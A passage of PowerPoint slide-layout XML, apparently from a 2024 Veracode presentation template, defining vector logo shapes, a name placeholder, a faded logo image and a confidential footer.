                <a:gd name="connsiteX35" fmla="*/ 806768 w 865822"/>
                <a:gd name="connsiteY35" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX36" fmla="*/ 865823 w 865822"/>
                <a:gd name="connsiteY36" fmla="*/ 263843 h 263842"/>
                <a:gd name="connsiteX37" fmla="*/ 765810 w 865822"/>
                <a:gd name="connsiteY37" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX38" fmla="*/ 720090 w 865822"/>
                <a:gd name="connsiteY38" fmla="*/ 0 h 263842"/>
                <a:gd name="connsiteX39" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY39" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX40" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY40" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX41" fmla="*/ 501015 w 865822"/>
                <a:gd name="connsiteY41" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX42" fmla="*/ 528638 w 865822"/>
                <a:gd name="connsiteY42" fmla="*/ 52388 h 263842"/>
                <a:gd name="connsiteX43" fmla="*/ 572453 w 865822"/>
                <a:gd name="connsiteY43" fmla="*/ 87630 h 263842"/>
                <a:gd name="connsiteX44" fmla="*/ 515303 w 865822"/>
                <a:gd name="connsiteY44" fmla="*/ 125730 h 263842"/>
                <a:gd name="connsiteX45" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY45" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX46" fmla="*/ 741998 w 865822"/>
                <a:gd name="connsiteY46" fmla="*/ 86678 h 263842"/>
                <a:gd name="connsiteX47" fmla="*/ 766763 w 865822"/>
                <a:gd name="connsiteY47" fmla="*/ 158115 h 263842"/>
                <a:gd name="connsiteX48" fmla="*/ 717233 w 865822"/>
                <a:gd name="connsiteY48" fmla="*/ 158115 h 26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865822" h="263842">
                  <a:moveTo>
                    <a:pt x="260985" y="262890"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="412433" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="104775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317183" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260985" y="262890"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="123825" y="164783"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="109538" y="128588"/>
                    <a:pt x="60008" y="0"/>
                    <a:pt x="60008" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="105728" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140970" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187643" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187643" y="0"/>
                    <a:pt x="138113" y="128588"/>
                    <a:pt x="123825" y="164783"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="720090" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="624840" y="252413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="169545"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="591503" y="162878"/>
                    <a:pt x="627698" y="141923"/>
                    <a:pt x="627698" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="627698" y="61913"/>
                    <a:pt x="618173" y="38100"/>
                    <a:pt x="601980" y="22860"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="584835" y="6668"/>
                    <a:pt x="562928" y="0"/>
                    <a:pt x="530543" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="444818" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444818" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500063" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565785" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678180" y="263843"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="678180" y="263843"/>
                    <a:pt x="690563" y="231458"/>
                    <a:pt x="699135" y="209550"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="785813" y="209550"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="794385" y="231458"/>
                    <a:pt x="806768" y="263843"/>
                    <a:pt x="806768" y="263843"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="865823" y="263843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="765810" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720090" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="515303" y="125730"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="501015" y="125730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501015" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528638" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="561023" y="52388"/>
                    <a:pt x="572453" y="70485"/>
                    <a:pt x="572453" y="87630"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="572453" y="97155"/>
                    <a:pt x="572453" y="125730"/>
                    <a:pt x="515303" y="125730"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="717233" y="158115"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="726758" y="132398"/>
                    <a:pt x="738188" y="99060"/>
                    <a:pt x="741998" y="86678"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="766763" y="158115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="717233" y="158115"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Freeform: Shape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635F78AC-04FE-8FEA-92B6-4CD73A120422}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6156886" y="1766793"/>
              <a:ext cx="151447" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 151447"/>
                <a:gd name="connsiteY3" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY4" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY7" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY8" fmla="*/ 157163 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 151448 w 151447"/>
                <a:gd name="connsiteY9" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY10" fmla="*/ 103823 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 55245 w 151447"/>
                <a:gd name="connsiteY11" fmla="*/ 52388 h 262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447" h="262890">
                  <a:moveTo>
                    <a:pt x="151448" y="52388"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="151448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="157163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151448" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="103823"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55245" y="52388"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Freeform: Shape 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E4545C5-F873-4D49-34AA-C753D868A6C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334879" y="1762031"/>
              <a:ext cx="263842" cy="272415"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY0" fmla="*/ 52388 h 272415"/>
                <a:gd name="connsiteX1" fmla="*/ 195263 w 263842"/>
                <a:gd name="connsiteY1" fmla="*/ 82868 h 272415"/>
                <a:gd name="connsiteX2" fmla="*/ 199073 w 263842"/>
                <a:gd name="connsiteY2" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX3" fmla="*/ 203835 w 263842"/>
                <a:gd name="connsiteY3" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX4" fmla="*/ 263842 w 263842"/>
                <a:gd name="connsiteY4" fmla="*/ 86678 h 272415"/>
                <a:gd name="connsiteX5" fmla="*/ 255270 w 263842"/>
                <a:gd name="connsiteY5" fmla="*/ 71438 h 272415"/>
                <a:gd name="connsiteX6" fmla="*/ 215265 w 263842"/>
                <a:gd name="connsiteY6" fmla="*/ 25718 h 272415"/>
                <a:gd name="connsiteX7" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY7" fmla="*/ 0 h 272415"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 263842"/>
                <a:gd name="connsiteY8" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX9" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY9" fmla="*/ 272415 h 272415"/>
                <a:gd name="connsiteX10" fmla="*/ 254317 w 263842"/>
                <a:gd name="connsiteY10" fmla="*/ 202883 h 272415"/>
                <a:gd name="connsiteX11" fmla="*/ 262890 w 263842"/>
                <a:gd name="connsiteY11" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX12" fmla="*/ 197167 w 263842"/>
                <a:gd name="connsiteY12" fmla="*/ 187643 h 272415"/>
                <a:gd name="connsiteX13" fmla="*/ 194310 w 263842"/>
                <a:gd name="connsiteY13" fmla="*/ 191453 h 272415"/>
                <a:gd name="connsiteX14" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY14" fmla="*/ 220028 h 272415"/>
                <a:gd name="connsiteX15" fmla="*/ 55245 w 263842"/>
                <a:gd name="connsiteY15" fmla="*/ 135255 h 272415"/>
                <a:gd name="connsiteX16" fmla="*/ 135255 w 263842"/>
                <a:gd name="connsiteY16" fmla="*/ 52388 h 272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3842" h="272415">
                  <a:moveTo>
                    <a:pt x="135255" y="52388"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="169545" y="52388"/>
                    <a:pt x="188595" y="74295"/>
                    <a:pt x="195263" y="82868"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199073" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203835" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263842" y="86678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255270" y="71438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="248602" y="60008"/>
                    <a:pt x="239077" y="42863"/>
                    <a:pt x="215265" y="25718"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183832" y="2858"/>
                    <a:pt x="148590" y="0"/>
                    <a:pt x="135255" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60960" y="0"/>
                    <a:pt x="0" y="60960"/>
                    <a:pt x="0" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210503"/>
                    <a:pt x="60960" y="272415"/>
                    <a:pt x="135255" y="272415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184785" y="272415"/>
                    <a:pt x="229552" y="246698"/>
                    <a:pt x="254317" y="202883"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="262890" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197167" y="187643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194310" y="191453"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="179070" y="209550"/>
                    <a:pt x="157163" y="220028"/>
                    <a:pt x="135255" y="220028"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92392" y="220028"/>
                    <a:pt x="55245" y="180975"/>
                    <a:pt x="55245" y="135255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54292" y="89535"/>
                    <a:pt x="90488" y="52388"/>
                    <a:pt x="135255" y="52388"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Freeform: Shape 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB87BC0A-F184-B153-8048-6B54676EAE22}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5986389" y="1766793"/>
              <a:ext cx="148589" cy="262890"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 262890"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY2" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX3" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY3" fmla="*/ 52388 h 262890"/>
                <a:gd name="connsiteX4" fmla="*/ 93345 w 148589"/>
                <a:gd name="connsiteY4" fmla="*/ 132398 h 262890"/>
                <a:gd name="connsiteX5" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY5" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY6" fmla="*/ 210503 h 262890"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 148589"/>
                <a:gd name="connsiteY7" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX8" fmla="*/ 13335 w 148589"/>
                <a:gd name="connsiteY8" fmla="*/ 262890 h 262890"/>
                <a:gd name="connsiteX9" fmla="*/ 115252 w 148589"/>
                <a:gd name="connsiteY9" fmla="*/ 224790 h 262890"/>
                <a:gd name="connsiteX10" fmla="*/ 148590 w 148589"/>
                <a:gd name="connsiteY10" fmla="*/ 131445 h 262890"/>
                <a:gd name="connsiteX11" fmla="*/ 121920 w 148589"/>
                <a:gd name="connsiteY11" fmla="*/ 47625 h 262890"/>
                <a:gd name="connsiteX12" fmla="*/ 14288 w 148589"/>
                <a:gd name="connsiteY12" fmla="*/ 0 h 262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89" h="262890">
                  <a:moveTo>
                    <a:pt x="14288" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="52388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14288" y="52388"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77152" y="52388"/>
                    <a:pt x="93345" y="102870"/>
                    <a:pt x="93345" y="132398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93345" y="202883"/>
                    <a:pt x="37147" y="210503"/>
                    <a:pt x="13335" y="210503"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="210503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="262890"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13335" y="262890"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57150" y="262890"/>
                    <a:pt x="89535" y="250508"/>
                    <a:pt x="115252" y="224790"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135255" y="204788"/>
                    <a:pt x="148590" y="167640"/>
                    <a:pt x="148590" y="131445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148590" y="102870"/>
                    <a:pt x="138113" y="71438"/>
                    <a:pt x="121920" y="47625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98108" y="16193"/>
                    <a:pt x="61913" y="0"/>
                    <a:pt x="14288" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent6"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4F51624-E334-B174-B50F-70B71F485830}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4532890" y="4353662"/>
            <a:ext cx="4971673" cy="590155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="177800" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="344488" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="522288" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="690562" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Lastname</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="Logo, icon&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4285535D-DDAE-3CFC-CD40-0F57D7A3D0DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="16000"/>
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId4">
                    <a14:imgEffect>
                      <a14:colorTemperature colorTemp="7964"/>
                    </a14:imgEffect>
                    <a14:imgEffect>
                      <a14:saturation sat="377000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="55342" b="60051"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="1800000">
            <a:off x="-1901772" y="1004912"/>
            <a:ext cx="6479289" cy="6171847"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 6479289"/>
              <a:gd name="connsiteY0" fmla="*/ 232645 h 6171847"/>
              <a:gd name="connsiteX1" fmla="*/ 402952 w 6479289"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX2" fmla="*/ 4072618 w 6479289"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6171847"/>
              <a:gd name="connsiteX3" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY3" fmla="*/ 4168477 h 6171847"/>
              <a:gd name="connsiteX4" fmla="*/ 6479289 w 6479289"/>
              <a:gd name="connsiteY4" fmla="*/ 4410761 h 6171847"/>
              <a:gd name="connsiteX5" fmla="*/ 3429000 w 6479289"/>
              <a:gd name="connsiteY5" fmla="*/ 6171847 h 6171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9289" h="6171847">
                <a:moveTo>
                  <a:pt x="0" y="232645"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="402952" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4072618" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4168477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6479289" y="4410761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3429000" y="6171847"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0643CFF-E47F-8721-09D7-C28CFD4229C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4235824"/>
            <a:ext cx="3611301" cy="2622177"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:schemeClr val="accent3"/>
              </a:gs>
              <a:gs pos="47000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                  <a:alpha val="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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E777D1F-83AD-B842-1146-CC26C2C8ADC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
